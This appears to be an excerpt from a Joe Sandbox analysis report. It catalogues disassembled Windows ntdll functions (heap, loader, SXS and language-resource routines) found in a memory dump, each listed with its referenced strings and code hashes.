                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                    • API String ID: 0-1657114761
                                                                    • Opcode ID: f8bf5be84b0526e98699eb069c80322d3dc99bdb43954de4cca23905b8b630f6
                                                                    • Instruction ID: 32626e1bbd737f9caeca4b01486349c8dac6cd019ed0bd6c4d3f57dda90ad807
                                                                    • Opcode Fuzzy Hash: f8bf5be84b0526e98699eb069c80322d3dc99bdb43954de4cca23905b8b630f6
                                                                    • Instruction Fuzzy Hash: 32A1F474A0624AEFD728CF68C480B6AB7F2FF94300F148569E88DCBA42D734B945C791
                                                                    Function 29004AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 29043456
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 29043437
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 2904342A
                                                                    • RtlDeactivateActivationContext, xrefs: 29043425, 29043432, 29043451
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    • API String ID: 0-1245972979
                                                                    • Opcode ID: a267acdf574e9d866e8a29f79308afc0330a5d9f8b3b31291cbc051e6c7d9942
                                                                    • Instruction ID: aedea0794cc92b50dfbfad8d39c92008b552083f5aa00acf70173ebe24376828
                                                                    • Opcode Fuzzy Hash: a267acdf574e9d866e8a29f79308afc0330a5d9f8b3b31291cbc051e6c7d9942
                                                                    • Instruction Fuzzy Hash: 92615572A00A199FD716CF18C992F5AB3E2EF84760F109D39E9589B240E734F802CBD5
                                                                    Function 29004D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2904362F
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 2904365C
                                                                    • LdrpFindDllActivationContext, xrefs: 29043636, 29043662
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 29043640, 2904366C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: c4f0c19ef78b357dba86bf1173c323fe77dc30416203e9f67f9bec9b15566185
                                                                    • Instruction ID: 9e015fea4ae83e46a78bdac8362bdd195b5050c66bd2fe372adf88deceadf00d
                                                                    • Opcode Fuzzy Hash: c4f0c19ef78b357dba86bf1173c323fe77dc30416203e9f67f9bec9b15566185
                                                                    • Instruction Fuzzy Hash: 70315B32D0065EAEFB29AB04D8A9F1DB3E4AF01794F068937D90C57151F760DD8282CD
                                                                    Function 28FE29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP: , xrefs: 28FE3264
                                                                    • HEAP[%wZ]: , xrefs: 28FE3255
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 28FE327D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • API String ID: 0-617086771
                                                                    • Opcode ID: fbd059152a2292b64e9839a7b63ea5001d8cd23894d338bbd8a27f7b083fab4e
                                                                    • Instruction ID: b66994d31331ee2ab4efcf46fa27ecf427a3973d45e32bebeac448cfef89ccc3
                                                                    • Opcode Fuzzy Hash: fbd059152a2292b64e9839a7b63ea5001d8cd23894d338bbd8a27f7b083fab4e
                                                                    • Instruction Fuzzy Hash: 1E92AC71A06248EFDB15CF68C444BADBBF2FF48314F18846AF959AB391E734A941CB50
                                                                    Function 28FF6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    • API String ID: 0-1077428164
                                                                    • Opcode ID: dac2726aa61a8cfdde3626019d91e0287e5df225bae6c196f4f2b50f335e5f73
                                                                    • Instruction ID: 6a82bf26f261c3c1ef695fc9e34e557a13e99b15e6820fc9a154a07ac60f427a
                                                                    • Opcode Fuzzy Hash: dac2726aa61a8cfdde3626019d91e0287e5df225bae6c196f4f2b50f335e5f73
                                                                    • Instruction Fuzzy Hash: A0C2CE726093959FD724CF24C880B9BBBE6AF98704F04892DF989C72A1E734D945CB52
                                                                    Function 28FCA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    • API String ID: 0-2779062949
                                                                    • Opcode ID: 1d6de6873982fb687885f2be9b3c8b3754fe132fa27eaa5e14b11fcf53c3b946
                                                                    • Instruction ID: 64f5a729f281081cad268ea9ae45d01a93ebaeda258c6e1213fb1dbd77346f67
                                                                    • Opcode Fuzzy Hash: 1d6de6873982fb687885f2be9b3c8b3754fe132fa27eaa5e14b11fcf53c3b946
                                                                    • Instruction Fuzzy Hash: 7DA15875D0262DABDB21DF24CC88BDAB7B9EF48710F1045EAE908A7250E7359E85CF50
                                                                    Function 28FF0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 2903A121
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 2903A10F
                                                                    • LdrpCheckModule, xrefs: 2903A117
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-161242083
                                                                    • Opcode ID: e3c497d35b17617b8380d287206e25ae2c69e6345534e45e366b82216dc27e4b
                                                                    • Instruction ID: a66125d9001edc7ef0024b4eeb7b7b65a94205ddb671cbadf2df18e4c7c9e68a
                                                                    • Opcode Fuzzy Hash: e3c497d35b17617b8380d287206e25ae2c69e6345534e45e366b82216dc27e4b
                                                                    • Instruction Fuzzy Hash: AC711675A01209EFCB18DFA8C980AAEB7F5EFA8304F54443DD905E7661E734AE42CB54
                                                                    Function 28FE0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-1334570610
                                                                    • Opcode ID: cb1fe97c6e58beef4066e0029b4643a10fa7f41562e7af3c2a8c3bec38e714be
                                                                    • Instruction ID: 3d1bdb68c144412d73d6d81bfaa04140256902e06364a231553c1b5365e7742e
                                                                    • Opcode Fuzzy Hash: cb1fe97c6e58beef4066e0029b4643a10fa7f41562e7af3c2a8c3bec38e714be
                                                                    • Instruction Fuzzy Hash: E061BE71601349EFD718CF24C480B5ABBE2FF85704F14896AE899CF692D770E982CB95
                                                                    Function 28FCCCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • InstallLanguageFallback, xrefs: 28FCCD7F
                                                                    • @, xrefs: 28FCCD63
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 28FCCD34
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: 3c1bf8ce1d265706844e6a98eea6cb3f4ac2f49c70fc318f6e596da164917801
                                                                    • Instruction ID: 6be04a64bc4e9a6ef641465bcc90369385789f46e9c573817965c4e04ad6d16b
                                                                    • Opcode Fuzzy Hash: 3c1bf8ce1d265706844e6a98eea6cb3f4ac2f49c70fc318f6e596da164917801
                                                                    • Instruction Fuzzy Hash: 1D5105B690534A9BD718CF25C454B6BB3E9BF88714F000D7EFA84D7290EB30DA058762
                                                                    Function 2908C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2908C1C5
                                                                    • PreferredUILanguages, xrefs: 2908C212
                                                                    • @, xrefs: 2908C1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    • Opcode ID: d665dcfbc16d0a694fd3214d7bd8ed4fba124f7d6712c361bdac846f5fc77565
                                                                    • Instruction ID: 0f47b1ad7f8a299102d07bb2eb1f99b806b3585912b383b608b8a182e4378161
                                                                    • Opcode Fuzzy Hash: d665dcfbc16d0a694fd3214d7bd8ed4fba124f7d6712c361bdac846f5fc77565
                                                                    • Instruction Fuzzy Hash: D8415E72A0222DEBDB05CBD4C881FDEB7F9BF14750F10857AEA05A7280E7749A468B50
                                                                    Function 29064144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    • Opcode ID: 85696db1628a5f6347435d77c84fc81887ec9ebf65444ae79bce2f0cda741796
                                                                    • Instruction ID: b51e2bcdd7c55aeb5796111607cdaeee1f990be88f4ba8e1baab763f37ded575
                                                                    • Opcode Fuzzy Hash: 85696db1628a5f6347435d77c84fc81887ec9ebf65444ae79bce2f0cda741796
                                                                    • Instruction Fuzzy Hash: 9F41F33190564C8BEB19CB95C840B9DBBF9FF55380F24086AD949EF7A5EB349942CB10
                                                                    Function 28FE0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-2558761708
                                                                    • Opcode ID: 4b63ea819276ef82011ba1053d82a3bb7e4fd58c88cffc9235b6e5a9b6a81ad7
                                                                    • Instruction ID: 93ed2c6d240784b3f4785f09669655b6fd1371407d9b9a8630fb4b674b7cd880
                                                                    • Opcode Fuzzy Hash: 4b63ea819276ef82011ba1053d82a3bb7e4fd58c88cffc9235b6e5a9b6a81ad7
                                                                    • Instruction Fuzzy Hash: 2F11DF3131A049DFD71CC714C880F1EB3A6FF80629F14856AE80DCBA61DB30D842CB55
                                                                    Function 290520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 29052104
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 290520F3
                                                                    • LdrpInitializationFailure, xrefs: 290520FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    • Opcode ID: 250b322e73404bdb7bdae71ea8408fb52e7364859dc073abb70d6324ab7e8d87
                                                                    • Instruction ID: f4b79056a650c920eaaa43ce8642ba3e5a1b62932526d8d4c509dbb1096202cd
                                                                    • Opcode Fuzzy Hash: 250b322e73404bdb7bdae71ea8408fb52e7364859dc073abb70d6324ab7e8d87
                                                                    • Instruction Fuzzy Hash: B9F0FF3060124CBBDA14E708DC82F9A37ADEB58B54F100825F605AB281D2B4EA41CA94
                                                                    Function 28FE03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    • Opcode ID: 589017126d28b77e757f578e3186174f35ecd410b21b5b8e25bd4519f9211061
                                                                    • Instruction ID: c4099f4cdba15bee75e3b53327f68b0268e02e1aeaebcb04c00820af12b69497
                                                                    • Opcode Fuzzy Hash: 589017126d28b77e757f578e3186174f35ecd410b21b5b8e25bd4519f9211061
                                                                    • Instruction Fuzzy Hash: 0B715A71A0114DAFCB05CFA8C990FAEB7F9BF48304F144465E909EB251EA34EE02CB60
                                                                    Function 2905CEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 2905CFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @
                                                                    • API String ID: 4062629308-2766056989
                                                                    • Opcode ID: 4c4d126c3e22244be119f3183f8864503d2d9d89e42b02ff5b49ae7550d93697
                                                                    • Instruction ID: b7507a35438c9ba57b9e91375e5e4d473ba18ed4b2f24ae4f6a1c2c2fcd1d025
                                                                    • Opcode Fuzzy Hash: 4c4d126c3e22244be119f3183f8864503d2d9d89e42b02ff5b49ae7550d93697
                                                                    • Instruction Fuzzy Hash: BD418F7590125CEFCB258FA5D880AAEBBF8FF54710F00492AE905DB254E734D942CBA5
                                                                    Function 28FDA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrResSearchResource Exit, xrefs: 28FDAA25
                                                                    • LdrResSearchResource Enter, xrefs: 28FDAA13
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                    • API String ID: 0-4066393604
                                                                    • Opcode ID: bdb37cd2e3ba463b6b0a66fbf6715fe1369eef6e90bf142ed60c17165c2b9b6c
                                                                    • Instruction ID: d4d2386fb997cfaf35aabc49845579299271d41046c0184cd89ad2299ff39ea9
                                                                    • Opcode Fuzzy Hash: bdb37cd2e3ba463b6b0a66fbf6715fe1369eef6e90bf142ed60c17165c2b9b6c
                                                                    • Instruction Fuzzy Hash: 5EE19072E02308EFDB15CF99C980B9EB7BAAF48350F584526EE00E7251D774CA52CB58
                                                                    Function 2909A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction ID: b5f6f9142cca0d5b33027dcdc49be2f167e18ff8dfc8be54908c42f15738a9ca
                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction Fuzzy Hash: 4AC1D0312243499BE718CF26C841B2BBBE5AFC4B58F048E2DF695CB290D774D546EB81
                                                                    Function 29072F60 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • , xrefs: 290732B8
                                                                    • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 29073011
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                    • API String ID: 0-4088147954
                                                                    • Opcode ID: d02380c42abe59fd26cf113000358ae4353812583fae7af8f42f2a70a691b863
                                                                    • Instruction ID: c3f46f022829753e9cc567a9c556652bf9f60c53d0ca03dd7cd92d4ab5a69cb2
                                                                    • Opcode Fuzzy Hash: d02380c42abe59fd26cf113000358ae4353812583fae7af8f42f2a70a691b863
                                                                    • Instruction Fuzzy Hash: 99C1DD716483499BE718CF14D880B9FB7F9AF98764F008D2EFA848B240E771D946C796
                                                                    Function 290A8324 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Lm)$Lm)
                                                                    • API String ID: 0-205724851
                                                                    • Opcode ID: 1c0bb81f902085b72afe77add7cdeb436cd043d75af2217bedee79ce609f25a8
                                                                    • Instruction ID: 37a528dc2608b762b06f3b3605c6a568acf578476142588dee17bf3ec70cd6a1
                                                                    • Opcode Fuzzy Hash: 1c0bb81f902085b72afe77add7cdeb436cd043d75af2217bedee79ce609f25a8
                                                                    • Instruction Fuzzy Hash: 9171E976D0020DBFDB15CB94C881FEEBBB9FB18350F104569AA14A7290E774AA46CBD4
                                                                    Function 28FDAC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpResGetMappingSize Enter, xrefs: 28FDAC6A
                                                                    • LdrpResGetMappingSize Exit, xrefs: 28FDAC7C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                    • API String ID: 0-1497657909
                                                                    • Opcode ID: 0ae165c3e8205c2cd78669cd170472f842b690bca540a255b7abdc95284ab923
                                                                    • Instruction ID: 5be05343bac285e5b2e1b5166eaf0df03ac0ad5b087ee866f45a7e9f8fdce2ce
                                                                    • Opcode Fuzzy Hash: 0ae165c3e8205c2cd78669cd170472f842b690bca540a255b7abdc95284ab923
                                                                    • Instruction Fuzzy Hash: 6861D072A02749DFDB05CFA9C880B8DB7B6BF48751F48496AEA00EB290D774D951C728
                                                                    Function 290743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$MUI
                                                                    • API String ID: 0-17815947
                                                                    • Opcode ID: cd0c409c23233314d5a9e1ec6c09476c91ec9b4f29f472272bee7e10684ffe01
                                                                    • Instruction ID: d9d4b6cb24bafcec99203079507b26d2e43c9aa7003acb414d580a16e7da74b9
                                                                    • Opcode Fuzzy Hash: cd0c409c23233314d5a9e1ec6c09476c91ec9b4f29f472272bee7e10684ffe01
                                                                    • Instruction Fuzzy Hash: 50513A71D0021DAEDB01CFA5CC80AEEBBBDEF08754F104929E615B7290D6319906CB64
                                                                    Function 29004C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0$Flst
                                                                    • API String ID: 0-758220159
                                                                    • Opcode ID: 05839a8c4fa241019e6e1b3072a1017ec10355856bf44d8b85740c962005557d
                                                                    • Instruction ID: 66aedfeb96f1ddfbc7a5a998b055a649ff968b32fab4504febbca738fedb00f1
                                                                    • Opcode Fuzzy Hash: 05839a8c4fa241019e6e1b3072a1017ec10355856bf44d8b85740c962005557d
                                                                    • Instruction Fuzzy Hash: EF5189B1E0064C8BEB18CF98D595B59FBF4EF44754F14887BD0099B251EB70EA82CB88
                                                                    Function 29002E9C Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 29042807
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 2904280C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                    • API String ID: 0-2104531740
                                                                    • Opcode ID: 587c898a8efd70893d0830f9745556485fbf21e9d288dd7984c8588eed7cd24e
                                                                    • Instruction ID: 7b8a5b0515c01b12502c5d933f4629267b244c8c895e9fe1083c121f0104232b
                                                                    • Opcode Fuzzy Hash: 587c898a8efd70893d0830f9745556485fbf21e9d288dd7984c8588eed7cd24e
                                                                    • Instruction Fuzzy Hash: 9841C035A01219EBD718CF59C840E6AB7E6FF98B50F11887DE9489B640E730DD92CBA0
                                                                    Function 28FDA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 28FDA309
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 28FDA2FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: 0ba4c6ea58bcec1e684cfc379a638a3534a884a03fbe3603e1f8307f95362ece
                                                                    • Instruction ID: 909a7a8fd225e33577294fbf376573aef7a40c72f68237ad184fbda018d78704
                                                                    • Opcode Fuzzy Hash: 0ba4c6ea58bcec1e684cfc379a638a3534a884a03fbe3603e1f8307f95362ece
                                                                    • Instruction Fuzzy Hash: 4141BC76A02789DBDB05CF59C840B5A77B7FF89300F2844A9EA04DB291E336CA41CB58
                                                                    Function 29010FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 29011025
                                                                    • @, xrefs: 29011050
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                    • API String ID: 0-2976085014
                                                                    • Opcode ID: 882b827c36983a5f44211e833a1b22a3e48184120a61a4d327b76e0c978db017
                                                                    • Instruction ID: 9710395b76b7acc45117f1ba3a46d50ecd18f13416c1bcd8e31174bb2d0ef0f2
                                                                    • Opcode Fuzzy Hash: 882b827c36983a5f44211e833a1b22a3e48184120a61a4d327b76e0c978db017
                                                                    • Instruction Fuzzy Hash: 93318F7290158CBBCB16DF95C884E9FBBBDEB94750F014965F500A7260D775DD02CBA0
